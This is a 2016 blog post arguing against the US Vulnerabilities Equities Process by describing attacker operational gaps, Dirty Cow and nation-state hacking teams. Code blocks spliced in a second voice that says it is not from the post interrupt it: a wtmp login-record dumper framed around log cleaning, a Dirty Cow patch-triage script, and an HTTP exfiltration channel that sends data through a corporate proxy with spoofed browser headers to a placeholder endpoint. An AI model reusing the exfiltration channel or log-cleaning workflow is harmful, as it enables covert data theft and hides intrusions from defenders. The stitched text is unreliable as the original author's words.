Thursday, October 27, 2016

Operational Gaps and the VEP

Operational Gaps as Hackers See Them


There's no doubt that if you spend your time reading the popular press you get the sense that cyber offense teams have an unlimited advantage, like reading about Ronda Rousey in her prime. But if you're a professional attacker, you spend your time with your paranoia dialed to 11, and for good reason. There are two ways to fail as a hacker. The first is to be tactically insecure - for example, as this person was when transferring the Dirty Cow exploit from one box to another in the clear like a total idiot (assuming the story is true):

This is how you get caught by just some random guy. Imagine Khrunichev's data capture capabilities on their internal infrastructure.

The other way to fail is to have a strategic insecurity, and one of the most common is having an "operational gap". The simplest way to understand how professional operators feel about hacking is that you are racing from exposure to exposure. When you SSH into a box with a stolen username and password, to take the simplest example, there is a window of time before you can use a local privilege escalation to get root and hide the fact that you are there by editing log files such as wtmp and utmp (a rough sketch of what those records look like is below).
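To make that window concrete, here is a minimal sketch of the login records an operator has to rewrite once they get root. This is my illustration, not anything from the post: it assumes the 384-byte glibc utmp record layout on x86-64 Linux, and other libcs, BSDs, and architectures use different layouts. Until you can open these files for writing, the "who logged in, from where, and when" evidence just sits there.

```python
#!/usr/bin/env python3
# Minimal sketch: dump the login records in wtmp so you can see exactly what a
# log-cleaning step would have to rewrite. Assumes the 384-byte glibc utmp
# record on x86-64 Linux; other platforms differ.
import struct
import time

WTMP = "/var/log/wtmp"        # historical logins; /var/run/utmp is "who is on now"
REC_FMT = "<hhi32s4s32s256shhiii16s20s"
REC_LEN = struct.calcsize(REC_FMT)   # 384 bytes with this layout

def cstr(raw: bytes) -> str:
    """Decode a NUL-padded C string field."""
    return raw.split(b"\x00", 1)[0].decode("ascii", "replace")

with open(WTMP, "rb") as f:
    while True:
        rec = f.read(REC_LEN)
        if len(rec) < REC_LEN:
            break
        (ut_type, _pad, _pid, line, _id, user, host,
         _term, _exit, _sess, tv_sec, _usec, _addr, _unused) = struct.unpack(REC_FMT, rec)
        if ut_type == 7:  # USER_PROCESS: an interactive login
            print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(tv_sec)),
                  cstr(user), cstr(line), cstr(host))
```

Run against /var/log/wtmp this prints every interactive login with a timestamp and source host, which is exactly the trail you cannot touch while you are stuck as an unprivileged user.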

When a bug like Dirty Cow dies, you may not have one to replace it. That means every time you SSH into a machine and it turns out to be patched you run the risk of getting caught without being able to clean up your logs. And getting caught once means your entire toolchain can get wrapped up. This is why operational gaps are so dangerous.
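As an illustration of that risk calculus (again my sketch, not the author's tooling), this is roughly the "is this box even worth trying?" triage an operator, or a defender auditing their own fleet, might run before relying on a single kernel bug. The cut-off versions are the upstream stable kernels that shipped the CVE-2016-5195 fix; distributions backport patches without bumping these numbers, so a version check like this is only a guess.

```python
#!/usr/bin/env python3
# Hedged sketch: guess whether the local kernel predates the upstream Dirty Cow
# (CVE-2016-5195) fix. Distro kernels backport fixes without changing these
# version numbers, so "possibly unpatched" is a hint to investigate, not a fact.
import platform
import re

# Upstream stable releases that included the fix (October 2016).
FIXED = {(4, 8): (4, 8, 3), (4, 7): (4, 7, 9), (4, 4): (4, 4, 26)}

def parse(release: str):
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    return tuple(int(g or 0) for g in m.groups()) if m else None

def maybe_vulnerable(release: str) -> bool:
    v = parse(release)
    if v is None:
        return True                      # can't parse it: assume the worst
    fixed = FIXED.get(v[:2])
    if fixed:
        return v < fixed
    return v < (4, 8, 3)                 # older branches relied on distro backports

if __name__ == "__main__":
    rel = platform.release()
    verdict = "possibly unpatched" if maybe_vulnerable(rel) else "looks patched"
    print(f"{rel}: {verdict}")
```

When a check like this comes back "looks patched" and you have no replacement bug, that is the operational gap: you either abort, or you proceed knowing you may never reach root and never get to clean up behind yourself.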

The good thing about being tied into everyone else is that when I fall into this crevasse I pull everyone else in with me!


In addition, machines you have implants on get upgraded all the time. Even hardware gets replaced sometimes! So you constantly have to rebuild your infrastructure - the covert network you have built on top of your target's real network requires a lot of maintenance. All of that maintenance means your implants need to be ported to the very latest Windows OS, or your local exploits need to work "Even when McAfee is installed", or the HTTP channel you are using for exfiltration needs to support the latest version of the BlueCoat reputational proxy. This constant hive of activity is positively ant-like.
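For a sense of why the exfiltration channel alone is a standing engineering cost, here is a minimal sketch of an HTTP channel that has to go out through the target's proxy and look like ordinary browser traffic to a reputational filter. Every name, URL, and header below is a hypothetical placeholder of mine, not anything from the post, and every time the proxy's rules or the browsers it expects change, code like this has to change with them.

```python
#!/usr/bin/env python3
# Minimal sketch: an outbound HTTP channel that speaks through a corporate
# proxy and sends browser-like headers. All endpoints and headers are
# hypothetical placeholders for illustration only.
import urllib.request

PROXY = "http://proxy.example.internal:8080"   # hypothetical corporate proxy
URL = "https://cdn.example.com/analytics"      # hypothetical blend-in endpoint

# Route everything through the proxy, as the target's network would force you to.
opener = urllib.request.build_opener(
    urllib.request.ProxyHandler({"http": PROXY, "https": PROXY})
)

req = urllib.request.Request(
    URL,
    data=b"placeholder payload bytes",
    headers={
        # Headers a reputational proxy expects from a real browser; these age
        # quickly, which is exactly the constant-maintenance problem.
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Content-Type": "application/octet-stream",
    },
)

with opener.open(req, timeout=30) as resp:
    print(resp.status, resp.reason)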

But imagine what would happen to an ant nest if the ants stopped cleaning it for just one day. That's what having any part of your toolchain not working feels like to a hacker. And add to that the traditional issues we all have with software development: building new parts of your toolchain can be a two-year investment. In most cases there is NO way to rush software development, and hacking is extremely sensitive to this.



Rapid Reaction Teams

That said, the original form of hacking team, even at the nation-state level, was much more vertically integrated, and every nation state still maintains this kind of team. Hackers tend to cluster into small (10 or so people) groups which build their toolchains (exploits, RATs, implants, C2 infrastructure, analysis toolkits, etc.) on the fly. The important difference here is that with this model the people who BUILD the tools are the same as the people who USE the tools.

This has the advantage of very high OPSEC (a toolchain that is entirely unique and customized to your target set), but also the disadvantages that you cannot maintain a large set of targets, that none of your toolkit is well tested, and that there is sometimes a delay between when you see something you need and when you get it, because you are not preparing for the future. That said, there's LESS of a delay because a team like this will often see something they need, build it overnight, and deploy it the next day before the system administrators are even awake. As you can imagine, this is a very powerful way of operating right up until you screw up and knock the main mail server off the network because your untested kernel implant doesn't cooperate with whatever RAID drivers your target happens to have installed.

In the nation-state arena your Rapid Reaction Team is most often specialized in going after your really hard targets, but every penetration testing company also works like this. Not only that, but most penetration testing companies have a large pile of 0day that they've found on engagements and that, frankly, they can't be bothered sending to vendors. Sometimes these get written up for conference talks, but usually not.

And of course, the reason you see people go on and on about Cyber Letters of Marque is that many nation states lean on a collection of private rapid reaction forces for the majority of their capability. Without the US setting norms in this area that we're comfortable with, we're not comparing apples to apples with our counterparts.

Capabilities, Costs, and Countermeasures



The difficulty in policy is that we get a lot of our understanding of how "painful" a regulation is, how effective a countermeasure is, or how much a particular capability will cost to build from public, unclassified sources. These sources are either looking at hackers who have gotten caught (aka FANCY BEAR!), or talking to people in the open-source information world who have a lot of experience with penetration testing companies, but not necessarily with the hybrid Rapid Reaction Force and Industrialized Cyber Group way the modern IC (in any country) works.

Using Exploits against the BORG


Hackers have ALWAYS assumed that defensive tools worked, even when they didn't.
Start with the obvious fact that, despite the optimism you see in policy papers that support the VEP, not all targets are soft targets. We build our Intelligence Community efforts so they can tackle very, very hard targets in addition to having a high level of reliability against a medium-sized business that happens to sell submarine parts to the Iranians.

But VEP supporters assume every company is penetrated the same way, and that our ability to penetrate them will last into perpetuity. The Schwartz-Knake paper on the subject throws a fig leaf over the problem of exploit scarcity by just saying "We'll increase the budgets a bit to handle this".

This post tries to get policy makers into the basic paranoid operational mindset a hacker lives in day in and day out, to counteract the superpowers the media likes to portray us as having. If you don't go into the details of how hacking is done, it's easy to over-simplify these issues. The result is the VEP. Codifying it into law or an executive order, or expanding its reach, would be a massive mistake.

----

Updates:
Ever heard of this company? No? Well I can guarantee they have enough 0day to own the whole Internet. Comforting thoughts!

Chris Rohlf is well known in the industry, but it's worth noting that NOBODY in the technical community thinks the VEP is at all workable. Who did they run this idea through before implementing it?
